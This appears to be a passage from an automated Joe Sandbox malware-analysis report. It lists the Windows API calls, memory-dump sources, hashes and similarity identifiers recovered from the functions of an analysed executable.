                                                                    • Opcode Fuzzy Hash: 37ac460dc6d41c8ad4a78e28ee8ebae1b3a6d56794bd463661746080a2d5e6dd
                                                                    • Instruction Fuzzy Hash: 57115C3624833BB9FB213529DC0ADB737DC9F05324F30005AFAD0E40A7FE6655115694
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 010488D7
                                                                    • CoInitialize.OLE32(00000000), ref: 01048904
                                                                    • CoUninitialize.OLE32 ref: 0104890E
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 01048A0E
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 01048B3B
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01062C0C), ref: 01048B6F
                                                                    • CoGetObject.OLE32(?,00000000,01062C0C,?), ref: 01048B92
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 01048BA5
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01048C25
                                                                    • VariantClear.OLEAUT32(?), ref: 01048C35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2395222682-0
                                                                    • Opcode ID: 9cd3b032615dca1fa8dde0fbe7dc0a7c158bf22fbba958e70f0dbf433967fab8
                                                                    • Instruction ID: 8b49a6f536a067ee5c19482d02b975da4316a996ef7057b09bb2d566958086c0
                                                                    • Opcode Fuzzy Hash: 9cd3b032615dca1fa8dde0fbe7dc0a7c158bf22fbba958e70f0dbf433967fab8
                                                                    • Instruction Fuzzy Hash: 5BC137B1608305AFD700EFA8C88492BBBE9FF89348F04496DF9859B251D771ED05CB52
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 01037A6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafeVartype
                                                                    • String ID:
                                                                    • API String ID: 1725837607-0
                                                                    • Opcode ID: 0fc466f6acadb2853617c115e4ae98969e3560c4d9c548b0525598db0f704119
                                                                    • Instruction ID: cefe169dcb8f44ebc7db5ed35ce67a5863ff7893cd6ef78e81ae5e58780ff240
                                                                    • Opcode Fuzzy Hash: 0fc466f6acadb2853617c115e4ae98969e3560c4d9c548b0525598db0f704119
                                                                    • Instruction Fuzzy Hash: CCB1A4B591020A9FDB11DF98C884BBEBBF8FF89321F144469E681E7251D778E941CB90
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 010311F0
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,01030268,?,00000001), ref: 01031204
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0103120B
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01030268,?,00000001), ref: 0103121A
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0103122C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01030268,?,00000001), ref: 01031245
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01030268,?,00000001), ref: 01031257
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01030268,?,00000001), ref: 0103129C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01030268,?,00000001), ref: 010312B1
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01030268,?,00000001), ref: 010312BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: 430487bd01c0fc19bae7454d6f57ad9fb13bc79bca65e4dfccf092308c749ac4
                                                                    • Instruction ID: 038a33ddc69baf524bb2d5f70655cc326af77731eb49a0deeb01e1a02aa74772
                                                                    • Opcode Fuzzy Hash: 430487bd01c0fc19bae7454d6f57ad9fb13bc79bca65e4dfccf092308c749ac4
                                                                    • Instruction Fuzzy Hash: 4B318DB5600304BBEB319F68D898F6A7BEDBB8D311F108155F980C6186D7BE99508B60
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FDFAA6
                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00FDFB45
                                                                    • UnregisterHotKey.USER32(?), ref: 00FDFC9C
                                                                    • DestroyWindow.USER32(?), ref: 010145D6
                                                                    • FreeLibrary.KERNEL32(?), ref: 0101463B
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01014668
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: fe49a0d824e376c4181582b4a751ec2f1c58e1890db9902a0b20639001dc91c3
                                                                    • Instruction ID: a1815a946f2a16ad4138bcf2bfbf6485a567f5f34cfc81a1398167db296d7321
                                                                    • Opcode Fuzzy Hash: fe49a0d824e376c4181582b4a751ec2f1c58e1890db9902a0b20639001dc91c3
                                                                    • Instruction Fuzzy Hash: 34A1BF31701212CFCB29EF14C994E69F7A5BF04714F1442AEE94AAB362CB38AD16DF51
                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,0102A439), ref: 0102A377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 3555792229-1603158881
                                                                    • Opcode ID: ba3e22167ea244630445ddcf5d90a979a79528c9ecc5b524e1b8df4fad3a098f
                                                                    • Instruction ID: c42325796fcbd268e9e0d4afd1db017f385e8df2433f28742661e521682bc882
                                                                    • Opcode Fuzzy Hash: ba3e22167ea244630445ddcf5d90a979a79528c9ecc5b524e1b8df4fad3a098f
                                                                    • Instruction Fuzzy Hash: D9911630700626EBDB08EFA8C841BEDFBB5BF04310F54815AE9C9A7651DF346589DB90
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00FD2EAE
                                                                      • Part of subcall function 00FD1DB3: GetClientRect.USER32(?,?), ref: 00FD1DDC
                                                                      • Part of subcall function 00FD1DB3: GetWindowRect.USER32(?,?), ref: 00FD1E1D
                                                                      • Part of subcall function 00FD1DB3: ScreenToClient.USER32(?,?), ref: 00FD1E45
                                                                    • GetDC.USER32 ref: 0100CD32
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0100CD45
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0100CD53
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0100CD68
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0100CD70
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0100CDFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: f71cd0e52c21a6cece7edcc8ef00a1d2c93b9a61e70286ffee0bd68f349ea4ac
                                                                    • Instruction ID: 045d05c335e8c1a7bb999026f5566b68ef82f06827ca55b3fbcda2102376f9b6
                                                                    • Opcode Fuzzy Hash: f71cd0e52c21a6cece7edcc8ef00a1d2c93b9a61e70286ffee0bd68f349ea4ac
                                                                    • Instruction Fuzzy Hash: 2C71C831500205DFEF629F68C984AEA7FB6FF48320F1843EBED955A296C7358841DB60
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01041A50
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01041A7C
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 01041ABE
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01041AD3
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01041AE0
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01041B10
                                                                    • InternetCloseHandle.WININET(00000000), ref: 01041B57
                                                                      • Part of subcall function 01042483: GetLastError.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 01042498
                                                                      • Part of subcall function 01042483: SetEvent.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 010424AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                    • String ID:
                                                                    • API String ID: 2603140658-3916222277
                                                                    • Opcode ID: e2de2f33190a0c07037e9cdf5a7df8a871a27b5d17213bf43e035b2e48835ec4
                                                                    • Instruction ID: 31ff3214860385029943efdd99b4a2a4bfb8ac75aeb7810a8d797c6996a90237
                                                                    • Opcode Fuzzy Hash: e2de2f33190a0c07037e9cdf5a7df8a871a27b5d17213bf43e035b2e48835ec4
                                                                    • Instruction Fuzzy Hash: 60417FB1500219BFEB129F54CC89FFB7BACFF08354F004166FA859A141E775AA948BA0
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0105F910), ref: 01048D28
                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0105F910), ref: 01048D5C
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01048ED6
                                                                    • SysFreeString.OLEAUT32(?), ref: 01048F00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                    • String ID:
                                                                    • API String ID: 560350794-0
                                                                    • Opcode ID: 3b11e7d7f342134c12af2d08474409f127e4c77acdea8e4871fb2814541ae6a3
                                                                    • Instruction ID: 6d7828daf0e984e10929807d027ea5f45a67e3aced6b068adc13b19795368657
                                                                    • Opcode Fuzzy Hash: 3b11e7d7f342134c12af2d08474409f127e4c77acdea8e4871fb2814541ae6a3
                                                                    • Instruction Fuzzy Hash: 28F15EB1A00209EFDF54DF98C884EAEBBB5FF49314F1084A9F945AB251DB31AD45CB50
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0104F6B5
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0104F848
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0104F86C
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0104F8AC
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0104F8CE
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0104FA4A
                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0104FA7C
                                                                    • CloseHandle.KERNEL32(?), ref: 0104FAAB
                                                                    • CloseHandle.KERNEL32(?), ref: 0104FB22
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                    • String ID:
                                                                    • API String ID: 4090791747-0
                                                                    • Opcode ID: 926ecdf9f7ea099e3d77a8153c0ef55c40bd4531fbd27da74008cdb74e52a6c3
                                                                    • Instruction ID: 8fc7268fac4884c9491ce326275fd8bd5f65e5336f8e88d27d1a2bc5ce4d32dd
                                                                    • Opcode Fuzzy Hash: 926ecdf9f7ea099e3d77a8153c0ef55c40bd4531fbd27da74008cdb74e52a6c3
                                                                    • Instruction Fuzzy Hash: C4E1BE716043429FD714EF28C880A6EBBE1BF85314F18846EF9C58B2A2CB75ED45DB52
                                                                    APIs
                                                                      • Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01033697,?), ref: 0103468B
                                                                      • Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01033697,?), ref: 010346A4
                                                                      • Part of subcall function 01034A31: GetFileAttributesW.KERNEL32(?,0103370B), ref: 01034A32
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 01034D40
                                                                    • _wcscmp.LIBCMT ref: 01034D5A
                                                                    • MoveFileW.KERNEL32(?,?), ref: 01034D75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 793581249-0
                                                                    • Opcode ID: 0b448d82e138c02b97b03f6229a680cb13dc70df95ed2c4caba2d9b6dda0e094
                                                                    • Instruction ID: ec898ca6b20a341d38767590e832f54cbd4b661912f7c22bacbf3dd5ffae9991
                                                                    • Opcode Fuzzy Hash: 0b448d82e138c02b97b03f6229a680cb13dc70df95ed2c4caba2d9b6dda0e094
                                                                    • Instruction Fuzzy Hash: 415150B20083459BC765EBA4DC849EFB7ECAFC4350F04092EA6C9D7151EE75A288C766
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 010586FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: 0dfc9f8a8397466400f5b75190d02880aa347d0609db541a4829faa100206189
                                                                    • Instruction ID: 9e174b3f15feabdabf2d77acd0a32fce722472ea2a136cfc1f369f7cb9015490
                                                                    • Opcode Fuzzy Hash: 0dfc9f8a8397466400f5b75190d02880aa347d0609db541a4829faa100206189
                                                                    • Instruction Fuzzy Hash: 9651B330500209BEEFA19A2A9C85FAF3FA5FB09750F108153FED1E61A1DB76E550CB61
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0100C2F7
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0100C319
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0100C331
                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0100C34F
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0100C370
                                                                    • DestroyIcon.USER32(00000000), ref: 0100C37F
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0100C39C
                                                                    • DestroyIcon.USER32(?), ref: 0100C3AB
                                                                      • Part of subcall function 0105A4AF: DeleteObject.GDI32(00000000), ref: 0105A4E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                    • String ID:
                                                                    • API String ID: 2819616528-0
                                                                    • Opcode ID: 7c491a0b6bb17f0b828b9a58822d0b961a44d074379fb10fec4587a7dea6d967
                                                                    • Instruction ID: d921df3bb6c0bb4b1b933f53f61b1bb88b9e9a85165bb060b85e86c0d154e960
                                                                    • Opcode Fuzzy Hash: 7c491a0b6bb17f0b828b9a58822d0b961a44d074379fb10fec4587a7dea6d967
                                                                    • Instruction Fuzzy Hash: C1518D31A10205AFEB61DF24CC45BAA3BE6FB54310F14465AF982972D0DB75A940EB90
                                                                    APIs
                                                                      • Part of subcall function 0102A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0102A84C
                                                                      • Part of subcall function 0102A82C: GetCurrentThreadId.KERNEL32 ref: 0102A853
                                                                      • Part of subcall function 0102A82C: AttachThreadInput.USER32(00000000,?,01029683,?,00000001), ref: 0102A85A
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0102968E
                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 010296AB
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 010296AE
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 010296B7
                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 010296D5
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 010296D8
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 010296E1
                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 010296F8
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 010296FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                    • String ID:
                                                                    • API String ID: 2014098862-0
                                                                    • Opcode ID: 1a642ba3f1c54f15452413d899fdaac73d72583821618fb946efcf77fbc69b21
                                                                    • Instruction ID: 37ae01af46eef0c4a657efd221394468a1cbfed8262c5f781c44eef0fc402f72
                                                                    • Opcode Fuzzy Hash: 1a642ba3f1c54f15452413d899fdaac73d72583821618fb946efcf77fbc69b21
                                                                    • Instruction Fuzzy Hash: 1A11C271910229BEF7206B709C49F6B3A5DDB4C754F100415F684AB090C9F75C10CBA8
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0102853C,00000B00,?,?), ref: 0102892A
                                                                    • HeapAlloc.KERNEL32(00000000,?,0102853C,00000B00,?,?), ref: 01028931
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0102853C,00000B00,?,?), ref: 01028946
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0102853C,00000B00,?,?), ref: 0102894E
                                                                    • DuplicateHandle.KERNEL32(00000000,?,0102853C,00000B00,?,?), ref: 01028951
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0102853C,00000B00,?,?), ref: 01028961
                                                                    • GetCurrentProcess.KERNEL32(0102853C,00000000,?,0102853C,00000B00,?,?), ref: 01028969
                                                                    • DuplicateHandle.KERNEL32(00000000,?,0102853C,00000B00,?,?), ref: 0102896C
                                                                    • CreateThread.KERNEL32(00000000,00000000,01028992,00000000,00000000,00000000), ref: 01028986
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
